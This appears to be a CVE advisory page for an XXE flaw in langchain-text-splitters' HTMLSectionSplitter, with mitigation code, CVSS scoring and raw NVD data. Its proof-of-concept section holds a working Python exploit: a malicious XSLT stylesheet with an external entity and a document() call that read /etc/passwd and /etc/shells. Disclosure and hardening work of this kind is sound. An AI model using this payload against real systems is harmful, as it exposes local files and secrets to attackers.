Security Vulnerability Report
CVE-2025-6985 CVSS 7.5 HIGH

Published: 2025-10-06 18:15:53
Last Modified: 2026-04-15 00:35:42

Description

The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT.
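The hardening measures the description refers to can be sketched as follows. This is a minimal illustration, assuming the application loads the stylesheet itself with lxml; `load_hardened_xslt` is a hypothetical helper name, not part of langchain-text-splitters, and this is not presented as the upstream fix. The parser options disable entity resolution, DTD loading, and network access, and `XSLTAccessControl.DENY_ALL` blocks file and network access from inside the stylesheet, including through `document()`.

```python
from lxml import etree


def load_hardened_xslt(xslt_path):
    """Hypothetical helper: compile a stylesheet with entity and I/O access disabled."""
    # Do not resolve external entities, load DTDs, or touch the network while parsing.
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        load_dtd=False,
    )
    xslt_tree = etree.parse(xslt_path, parser)

    # Deny file and network reads/writes requested by the stylesheet itself,
    # which covers the XSLT document() function.
    return etree.XSLT(xslt_tree, access_control=etree.XSLTAccessControl.DENY_ALL)
```

The returned object is called like any other `etree.XSLT` transform, for example `load_hardened_xslt("style.xslt")(html_tree)`. Where custom stylesheets are not needed at all, refusing untrusted XSLT input entirely is the simpler control.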

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
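To show how the 7.5 score follows from the vector, here is a minimal sketch of the CVSS v3.0 base score arithmetic for Scope: Unchanged vectors. The weight table contains only the metric values this vector needs, and `base_score` is an illustrative helper, not a complete CVSS calculator.

```python
import math

# Metric weights from the CVSS v3.0 specification (subset used by this vector).
WEIGHTS = {
    "AV": {"N": 0.85},
    "AC": {"L": 0.77},
    "PR": {"N": 0.85},
    "UI": {"N": 0.85},
    "C": {"H": 0.56, "N": 0.0},
    "I": {"H": 0.56, "N": 0.0},
    "A": {"H": 0.56, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as the CVSS specification requires."""
    return math.ceil(value * 10) / 10


def base_score(vector):
    """Return (base, exploitability, impact) for a Scope: Unchanged vector."""
    # Skip the "CVSS:3.0" prefix and map each metric to its value.
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: table[metrics[name]] for name, table in WEIGHTS.items()}

    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    if impact <= 0:
        return 0.0, round(exploitability, 1), 0.0
    base = roundup(min(impact + exploitability, 10))
    return base, round(exploitability, 1), round(impact, 1)


print(base_score("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"))
# (7.5, 3.9, 3.6)
```

The sub-scores match the `exploitabilityScore` (3.9) and `impactScore` (3.6) fields in the raw JSON record.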

Configurations (Affected Products)

No configuration data available.

langchain-text-splitters == 0.3.8
lxml <= 4.9.x (default entity resolution)
lxml >= 5.0.0 (XSLTAccessControl not configured)
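A quick way to compare an environment against the combinations listed above is sketched below. `exposure_notes` is a hypothetical helper, and it only reflects the versions named in this report: an empty result means no listed condition matched, not that the installation is known to be safe.

```python
from importlib.metadata import PackageNotFoundError, version


def installed_version(package):
    """Return the installed version string of a package, or None if absent."""
    try:
        return version(package)
    except PackageNotFoundError:
        return None


def exposure_notes(splitters_version, lxml_version):
    """Hypothetical helper: list which conditions from this report apply."""
    notes = []
    if splitters_version == "0.3.8":
        notes.append("langchain-text-splitters 0.3.8 is the version named in the advisory")
    if lxml_version is not None:
        major = int(lxml_version.split(".")[0])
        if major < 5:
            notes.append("lxml < 5.0: external entities are resolved by default")
        else:
            notes.append(
                "lxml >= 5.0: document() can still read URIs "
                "unless XSLTAccessControl is applied"
            )
    return notes


if __name__ == "__main__":
    for note in exposure_notes(
        installed_version("langchain-text-splitters"),
        installed_version("lxml"),
    ):
        print(note)
```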

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-6985 PoC - XXE via XSLT in langchain-text-splitters
# Vulnerability: HTMLSectionSplitter allows arbitrary XSLT parsing without hardening
from langchain_text_splitters import HTMLSectionSplitter

# Malicious XSLT stylesheet with external entity injection
# This XSLT uses document() function to read local files
malicious_xslt = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:stylesheet [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <output>
      <file_content>&xxe;</file_content>
      <!-- Alternative: use document() to read arbitrary files -->
      <secret_content>
        <xsl:copy-of select="document('file:///etc/shells')"/>
      </secret_content>
    </output>
  </xsl:template>
</xsl:stylesheet>"""

# HTML content to be processed
html_content = """
<html>
<head><title>Test</title></head>
<body>
<h1>Section Header</h1>
<p>This is test content for the splitter.</p>
</body>
</html>
"""

# Trigger the vulnerability by providing malicious XSLT
splitter = HTMLSectionSplitter(
    headers_to_split_on=[("h1", "Header 1")],
    xslt_stylesheet=malicious_xslt  # Vulnerable: no sanitization applied
)

# Process HTML - this will trigger XXE and read /etc/passwd
chunks = splitter.split_text(html_content)
for chunk in chunks:
    print(chunk.page_content)

# The output will contain the contents of /etc/passwd

References

https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73ff8331

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6985", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:52.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73ff8331", "source": "[email protected]"}]}}